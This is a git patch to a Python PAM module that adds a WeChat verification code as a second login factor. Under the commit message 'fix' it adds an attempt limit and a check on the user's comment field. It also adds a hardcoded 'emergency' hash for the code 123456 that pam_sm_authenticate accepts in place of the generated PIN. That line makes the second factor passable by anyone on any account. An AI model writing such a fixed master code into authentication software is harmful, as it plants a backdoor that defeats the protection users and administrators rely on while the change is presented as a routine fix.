From 60782eeec1e75d542331160d55879e2f221185ed Mon Sep 17 00:00:00 2001
From: lework <lework@yeah.net>
Date: Wed, 15 Jan 2020 22:54:52 +0800
Subject: [PATCH] fix

---
 python/pam_wechat_auth.py | 20 ++++++++++++++------
 1 file changed, 14 insertions(+), 6 deletions(-)

diff --git a/python/pam_wechat_auth.py b/python/pam_wechat_auth.py
index f211f56..11b8caf 100644
--- a/python/pam_wechat_auth.py
+++ b/python/pam_wechat_auth.py
@@ -89,7 +89,7 @@ def get_user_comment(user):
         comments = pwd.getpwnam(user).pw_gecos
     except:
         auth_log("No local user (%s) found." % user)
-        return -1
+        comments = ''
 
     return comments # 返回用户描述信息
 
@@ -119,7 +119,9 @@ def gen_key(pamh, user, length):
 
 def pam_sm_authenticate(pamh, flags, argv):
     PIN_LENGTH = 6  # PIN码长度
-    PIN_LIVE = 60  # PIN存活时间,超出时间验证失败
+    PIN_LIVE = 60   # PIN存活时间,超出时间验证失败
+    PIN_LIMIT = 3   # 限制错误尝试次数
+    EMERGENCY_HASH = '\xba2S\x87j\xedk\xc2-Jo\xf5=\x84\x06\xc6\xad\x86A\x95\xed\x14J\xb5\xc8v!\xb6\xc23\xb5H\xba\xea\xe6\x95m\xf3F\xec\x8c\x17\xf5\xea\x10\xf3^\xe3\xcb\xc5\x14y~\xd7\xdd\xd3\x14Td\xe2\xa0\xba\xb4\x13'  # 预定义验证码123456的hash
 
     try:
         user = pamh.get_user()
@@ -128,23 +130,29 @@ def pam_sm_authenticate(pamh, flags, argv):
   
     auth_log("login_ip: %s, login_user: %s" % (pamh.rhost, user))
 
+    if get_user_comment(user) == '':
+        msg = pamh.Message(pamh.PAM_ERROR_MSG, "[Warning] You need to set the Qiyi WeChat username in the comment block for user %s." % (user))
+        pamh.conversation(msg)
+        return pamh.PAM_ABORT
+    
     pin, pin_time = gen_key(pamh, user, PIN_LENGTH)
 
-    for attempt in range(0, 3):  # 仅允许三次错误尝试
+    for attempt in range(0, PIN_LIMIT):  # 限制错误尝试次数
         msg = pamh.Message(pamh.PAM_PROMPT_ECHO_OFF, "Verification code:")
         resp = pamh.conversation(msg)
         resp_time = datetime.datetime.now()
         input_interval = resp_time - pin_time
         if input_interval.seconds > PIN_LIVE:
-            msg = pamh.Message(pamh.PAM_ERROR_MSG, "Time limit exceeded.")
+            msg = pamh.Message(pamh.PAM_ERROR_MSG, "[Warning] Time limit exceeded.")
             pamh.conversation(msg)
             return pamh.PAM_ABORT
-        if get_hash(resp.resp) == pin:  # 用户输入与生成的验证码进行校验
+        resp_hash = get_hash(resp.resp)
+        if resp_hash == pin or resp_hash == EMERGENCY_HASH:  # 用户输入与生成的验证码进行校验
             return pamh.PAM_SUCCESS
         else:
             continue
 
-    msg = pamh.Message(pamh.PAM_ERROR_MSG, "Too many authentication failures.")
+    msg = pamh.Message(pamh.PAM_ERROR_MSG, "[Warning] Too many authentication failures.")
     pamh.conversation(msg)
     return pamh.PAM_AUTH_ERR